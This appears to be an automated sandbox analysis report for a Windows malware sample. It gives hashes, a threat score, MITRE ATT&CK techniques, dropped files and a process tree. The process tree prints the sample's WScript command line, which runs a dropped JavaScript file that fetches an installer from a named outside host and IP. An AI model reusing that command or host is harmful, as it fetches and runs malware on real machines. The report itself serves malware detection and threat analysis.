44c26380b55ce9cd8f066c18747028a60fea56c0f9e2fc31abe053daba09ca13

Analysis

max time kernel
121s
max time network
123s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
04/10/2024, 21:22

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

14f6765e0420a79c30caff981769b7a2_JaffaCakes118.exe
Size

184KB
MD5

14f6765e0420a79c30caff981769b7a2
SHA1

89df0ce845ef3d32bdc0700131e48e9b343874e4
SHA256

44c26380b55ce9cd8f066c18747028a60fea56c0f9e2fc31abe053daba09ca13
SHA512

fdfe3bdd7fad1c0b165fddc1302265a1edd51b50dafa2016435747d83221ee79ca3b3c3ba4b48a3f46eed3b0bc827d3e131d99afbb24e9be531ebd938325ea84
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3N:/7BSH8zUB+nGESaaRvoB7FJNndn0

Score

8^/10

discovery execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	2216	WScript.exe
8	2216	WScript.exe
10	2216	WScript.exe
12	2628	WScript.exe
13	2628	WScript.exe
15	2740	WScript.exe
16	2740	WScript.exe
19	2920	WScript.exe
20	2920	WScript.exe
22	2256	WScript.exe
23	2256	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	14f6765e0420a79c30caff981769b7a2_JaffaCakes118.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 1444 wrote to memory of 2216	1444	14f6765e0420a79c30caff981769b7a2_JaffaCakes118.exe	30
PID 1444 wrote to memory of 2216	1444	14f6765e0420a79c30caff981769b7a2_JaffaCakes118.exe	30
PID 1444 wrote to memory of 2216	1444	14f6765e0420a79c30caff981769b7a2_JaffaCakes118.exe	30
PID 1444 wrote to memory of 2216	1444	14f6765e0420a79c30caff981769b7a2_JaffaCakes118.exe	30
PID 1444 wrote to memory of 2628	1444	14f6765e0420a79c30caff981769b7a2_JaffaCakes118.exe	32
PID 1444 wrote to memory of 2628	1444	14f6765e0420a79c30caff981769b7a2_JaffaCakes118.exe	32
PID 1444 wrote to memory of 2628	1444	14f6765e0420a79c30caff981769b7a2_JaffaCakes118.exe	32
PID 1444 wrote to memory of 2628	1444	14f6765e0420a79c30caff981769b7a2_JaffaCakes118.exe	32
PID 1444 wrote to memory of 2740	1444	14f6765e0420a79c30caff981769b7a2_JaffaCakes118.exe	34
PID 1444 wrote to memory of 2740	1444	14f6765e0420a79c30caff981769b7a2_JaffaCakes118.exe	34
PID 1444 wrote to memory of 2740	1444	14f6765e0420a79c30caff981769b7a2_JaffaCakes118.exe	34
PID 1444 wrote to memory of 2740	1444	14f6765e0420a79c30caff981769b7a2_JaffaCakes118.exe	34
PID 1444 wrote to memory of 2920	1444	14f6765e0420a79c30caff981769b7a2_JaffaCakes118.exe	36
PID 1444 wrote to memory of 2920	1444	14f6765e0420a79c30caff981769b7a2_JaffaCakes118.exe	36
PID 1444 wrote to memory of 2920	1444	14f6765e0420a79c30caff981769b7a2_JaffaCakes118.exe	36
PID 1444 wrote to memory of 2920	1444	14f6765e0420a79c30caff981769b7a2_JaffaCakes118.exe	36
PID 1444 wrote to memory of 2256	1444	14f6765e0420a79c30caff981769b7a2_JaffaCakes118.exe	38
PID 1444 wrote to memory of 2256	1444	14f6765e0420a79c30caff981769b7a2_JaffaCakes118.exe	38
PID 1444 wrote to memory of 2256	1444	14f6765e0420a79c30caff981769b7a2_JaffaCakes118.exe	38
PID 1444 wrote to memory of 2256	1444	14f6765e0420a79c30caff981769b7a2_JaffaCakes118.exe	38

C:\Users\Admin\AppData\Local\Temp\14f6765e0420a79c30caff981769b7a2_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\14f6765e0420a79c30caff981769b7a2_JaffaCakes118.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1444
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf129.js" http://www.djapp.info/?domain=AeofjMMZmc.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf129.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2216
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf129.js" http://www.djapp.info/?domain=AeofjMMZmc.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf129.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2628
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf129.js" http://www.djapp.info/?domain=AeofjMMZmc.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf129.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2740
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf129.js" http://www.djapp.info/?domain=AeofjMMZmc.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf129.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2920
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf129.js" http://www.djapp.info/?domain=AeofjMMZmc.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf129.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2256

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
7fb5fa1534dcf77f2125b2403b30a0ee

SHA1
365d96812a69ac0a4611ea4b70a3f306576cc3ea

SHA256
33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

SHA512
a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
f65723530e830883ae5123de11fa3a31

SHA1
bbad1fade657d3aff406f7f58d02e4713126d937

SHA256
ff740e43be4cffd98a3a935cea255ef7b94bcd49ad9f45e340738af95d9a400c

SHA512
7658ccc1c4fb1f217db86eaa92ebc56fb48a68892b6ab1b89c0a698729a28c8641b88db380329036f48f8a65d34e6a1882f5a8ec8b32158986956182e225705c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
235503b313ac5baef44ca0c176fc9138

SHA1
edbbd8128e3dbd54694478c18c263906d3101118

SHA256
5af191bfd914b974a450fcb0369ae08e24bc482287d0ba0cc3471e18426e2ac7

SHA512
b5ca9760e16d0ea389ddd5e9538581e857df713aa5874743a921fdfa2bffd3148a8d6c44a77d0fc2af5d2fee553c71e893c42090595acc7aae8d75b28e8a316d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
eff7b6b4a032498e124a9acc6f8dfad4

SHA1
6b2c087eabf09c8b9a81ed6fbbb7961d78d527f3

SHA256
c47900545076ae6d992a7ee1c54a8a24a9c4c7e851116a9ae52c2585a6c9f906

SHA512
142d996e4f7e054863e396d9ca6d33c22a33473f4bca49eaffdec549189860daba44f32149ff76c3ff93c52c80bf7e76c607e257c93ffc57170f4e42edcb3e59

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AS91FDNI\domain_profile[1].htm

Filesize
40KB

MD5
888d823f50e04b9fa72fdc09e048c38a

SHA1
9885f4e8472f2f1ea4caec28c67ae6880bff86a1

SHA256
3fcc278d69c52e62256384550f30766595528b4cd5a16cb9c4f4a9c486ac16f0

SHA512
f22aad9113ce71908f01b808fe92995eb265c4da22a5632651642600a987f12d20abac5e82c5619a2b809f7f837f3f6e48255fc59d354c183654c249ff829f82

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AS91FDNI\domain_profile[1].htm

Filesize
6KB

MD5
8538cdfaada219255480626e0d4b335b

SHA1
c339355e81d7b4b3067bb0359c3f8047fe2e96a4

SHA256
d80f6090f1fc5fcbb0ba7238f7ca0e1574740c59cac360cada47b19b850693e3

SHA512
cb8a905a3b62eb2c0179c90466dbd5354c163ea7bfa227323bc2b30c49965955f6eefd537b5539b8eb64caa8384c6a94bbd7dac4555c99651689b2671633a27f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S8GI6B9B\domain_profile[1].htm

Filesize
6KB

MD5
41e55f3e4559c59b5830fd82b1778432

SHA1
9d0b6849c74e08e5115f2450e2e529d4343a1ef9

SHA256
b8328a4c80c89c2218b58d3a8e89690656acb67b1b2db0ca0f85fc42e08096f0

SHA512
6080fdcc3b133d14028cc3d8d81ca12d070b12a9ecaf81162ca3888c5506eb404e67d42fc35b88df6c389a42a1b3cebaabc3692a2f1e51b8c28f971802c8cf8a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S8GI6B9B\domain_profile[1].htm

Filesize
6KB

MD5
ce12fb58d411d8ea4482be87d1472a1d

SHA1
133b3aa39b5a9f2de5790c25b987cd4cbf678cbe

SHA256
407d987618822bc7cc71c0e67cdc5a945077b4095c1346c3964052665fa96c85

SHA512
3bb82fb67c4e23b1f8ee5f162f9bd9feb6ff06b81cb0fba3cc771d9cbb607581f6690494133235dc083361028d3faaf653a40e35f4d7524c5936a84c32f945ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab30F0.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar4922.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf129.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\QDT0W5EF.txt

Filesize
175B

MD5
04f2185659e2e9d1f1a2fb152ca15f38

SHA1
47a892670b6e6c554c97592a8050f6adfa24af0a

SHA256
a79c99e79eca26c9e467177b5f8f55effdcfd87675f7e2ca98d58532cf5f2590

SHA512
acdeb6fe510cedc25f125b77beb27c42d95e8ddb7ceacb56000f955d86e6d1dc3fc084261e74604cb7dfa1f4f418dc28a17a6dd31fa47d207f92159be288a31a

Download Submit